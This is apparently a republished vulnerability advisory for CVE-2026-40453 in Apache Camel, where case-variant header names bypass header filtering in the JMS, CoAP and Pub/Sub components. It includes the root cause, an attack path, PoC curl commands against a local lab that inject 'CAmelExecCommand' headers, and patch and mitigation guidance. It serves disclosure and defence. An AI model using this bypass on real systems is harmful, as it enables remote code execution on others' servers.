CVE-2026-40453: Apache Camel Case‑Insensitive Header Injection Vulnerability (PoC Released)

CVE‑2026‑40453 is a medium‑severity Apache Camel flaw where case‑insensitive header handling lets attackers inject malformed internal control headers, bypass filters and achieve remote code execution or arbitrary file writes, with a public PoC and detailed mitigation guidance provided.

Black & White Path
Black & White Path
Black & White Path
CVE-2026-40453: Apache Camel Case‑Insensitive Header Injection Vulnerability (PoC Released)

Vulnerability Overview

CVE‑2026‑40453 is an Improper Handling of Case Sensitivity issue in Apache Camel (MEDIUM severity). It is an incomplete fix of CVE‑2025‑27636. Attackers with producer rights on JMS, CoAP, SJMS, or Google Pub/Sub can send headers whose names differ only in case, bypassing HeaderFilterStrategy and causing remote code execution or arbitrary file write.

Risk Summary

CVE ID: CVE‑2026‑40453

Type: CWE‑20 Improper Input Validation – Header Injection

Severity: Medium

Affected components: camel‑jms, camel‑sjms, camel‑coap, camel‑google‑pubsub

Affected classes: JmsHeaderFilterStrategy, ClassicJmsHeaderFilterStrategy, SjmsHeaderFilterStrategy, CoAPHeaderFilterStrategy, GooglePubsubHeaderFilterStrategy

Versions impacted: 3.0.0‑4.14.5, 4.15.0‑4.18.1, 4.19.0‑4.20.0 (pre‑4.20.0)

Fixed in: 4.14.6, 4.18.2, 4.20.0

Prerequisite for exploitation: producer permission on the target protocol

Impact: Remote Code Execution / Arbitrary File Write

Technical Root‑Cause Analysis

Vulnerability Principle

Apache Camel components filter internal control headers via HeaderFilterStrategy. The HTTP implementation was patched to call setLowerCase(true), making filtering case‑insensitive. Five non‑HTTP strategies (CoAP, JMS, SJMS, Google Pub/Sub, etc.) omitted this call, leaving case‑sensitive filtering.

public HttpHeaderFilterStrategy() {
    setOutFilterStartsWith(CAMEL_FILTER_STARTS_WITH);
    setInFilterStartsWith(CAMEL_FILTER_STARTS_WITH);
    setLowerCase(true); // added in CVE‑2025‑27636 fix
}
public CoAPHeaderFilterStrategy() {
    setOutFilterStartsWith(CAMEL_FILTER_STARTS_WITH);
    setInFilterStartsWith(CAMEL_FILTER_STARTS_WITH);
    // missing setLowerCase(true) → case‑sensitive filtering
}

Camel Exchange stores headers in a case‑insensitive map. A header like CAmelExecCommandExecutable bypasses the case‑sensitive filter, is stored under its canonical name CamelExecCommandExecutable, and downstream components such as camel‑exec or camel‑file interpret it as a command.

Attack Path

Attacker sends CoAP/JMS request
    ↓
URI‑Query parameters become Exchange In Headers
    ↓
CoAPHeaderFilterStrategy.applyFilterToExternalHeaders()
    ↓
"CAmelExecCommandExecutable" fails startsWith("Camel") → not filtered
    ↓
Header stored in Camel Exchange (case‑insensitive map)
    ↓
camel‑exec resolves header as CamelExecCommandExecutable
    ↓
Remote Code Execution / Arbitrary File Write

Proof‑of‑Concept

PoC uses the camel‑coap component (self‑contained). Repository: https://github.com/sarojkpr/CVE-2026-40453

Vulnerable Route

from("coap://0.0.0.0:5683/run")
    .to("exec:echo?args=hello")
    .convertBodyTo(String.class);

Normal Request

curl http://localhost:8080/exploit/normal
# returns: hello

Canonical Header (filtered)

curl http://localhost:8080/exploit/canonical
# inject CamelExecCommandExecutable / CamelExecCommandArgs
# result: /tmp/pwned‑canonical created: false (blocked)

Case‑Variant Header (bypass – RCE)

curl http://localhost:8080/exploit/attack
# inject CAmelExecCommandExecutable / CAmelExecCommandArgs
# result: /tmp/pwned created: true (RCE succeeded)

Reproduction Steps

git clone https://github.com/sarojkpr/CVE-2026-40453
cd CVE-2026-40453
mvn clean package -DskipTests
docker compose up -d --build
# run the three curl commands above to observe differences
docker compose down

Impact Scope

Any integration scenario using the affected components with downstream producers such as exec, file, or direct is vulnerable. Typical enterprise message‑routing setups that rely on JMS, SJMS, CoAP, or Google Pub/Sub are affected.

Remediation

Upgrade (Preferred)

4.14.x → 4.14.6

4.15.x‑4.18.x → 4.18.2

4.19.x‑4.20.x → 4.20.0

Major version upgrades may introduce API changes; test before production deployment.

Temporary Mitigations

Filter Camel internal headers case‑insensitively in all pipelines.

Restrict unauthorized access to JMS/CoAP/other protocols; block anonymous producers.

Audit routes and remove or restrict high‑risk producers ( exec, file).

Isolate Camel routing components on separate network segments.

Vulnerability Timeline

2025‑03: CVE‑2025‑27636 disclosed; HttpHeaderFilterStrategy patched with setLowerCase(true).

2025‑03‑09: Patch announcement.

~2025: Researcher discovered five other strategies remained unpatched.

2026: CAMEL‑23313 patch submitted, fixing all five components.

2026: CVE‑2026‑40453 officially disclosed; PoC released.

References

Apache Camel security advisory: https://camel.apache.org/security/CVE-2026-40453.html

JIRA issue CAMEL‑23313: https://issues.apache.org/jira/browse/CAMEL-23313

CVE record: https://www.cve.org/CVERecord?id=CVE-2026-40453

PoC repository: https://github.com/sarojkpr/CVE-2026-40453

Original Source

Signed-in readers can open the original source through BestHub's protected redirect.

Sign in to view source
Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactadmin@besthub.devand we will review it promptly.

Information SecurityRemote Code ExecutionCase SensitivityApache CamelCVE-2026-40453Header Injection
Black & White Path
Written by

Black & White Path

We are the beacon of the cyber world, a stepping stone on the road to security.

0 followers
Reader feedback

How this landed with the community

Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.